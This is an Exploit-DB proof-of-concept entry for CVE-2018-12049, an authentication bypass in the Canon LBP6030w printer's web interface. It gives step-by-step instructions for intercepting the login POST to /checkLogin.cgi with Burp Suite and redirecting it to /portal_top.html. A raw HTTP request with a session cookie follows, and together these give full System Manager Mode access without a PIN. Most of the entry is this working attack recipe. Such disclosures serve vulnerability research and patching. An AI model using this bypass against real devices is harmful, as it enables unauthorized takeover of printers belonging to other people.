EDB-ID: 44886 | Author: Huy Kha | Published: 2018-06-12 | CVE: CVE-2018-12049 | Type: Webapps | Platform: Hardware | Vulnerable App: N/A | # Date: 2018-06-07
# Exploit Author: Huy Kha
# Vendor Homepage: http://global.canon.com
# Version: LBP6030w
# Severity: High (Leads to full System Manager Mode account take-over)
# CVE: CVE-2018-12049
# Description : A remote attacker can bypass the System Manager Mode on the
# Canon LBP6030w web interface without a PIN for /checkLogin.cgi via vectors
# involving /portal_top.html to get full access to the device.
# PoC :
# Now with a simple request, we can bypass the authentication and get full
# access to the printer with ''System Manager Mode''
1. Go to the following url: http://TargetURL/
2. Click on System Manager Mode
3. Intercept now the request with Burpsuite and click then on 'Ok'' to
login. And now you have to forward POST /checkLogin.cgi HTTP/1.1 request to
the GET /portal_top.html HTTP/1.1
# Request :
GET /portal_top.html HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://23.125.171.217/
Cookie: sessid=TOIJNROiOcNQQaGdHeQ3PQ##
Connection: close
Upgrade-Insecure-Requests: 1
# Do we have now access to the printer with System Manager? : Yes
# Impact: A remote attacker can have take-over the whole printer if there
# is no PIN set by a user.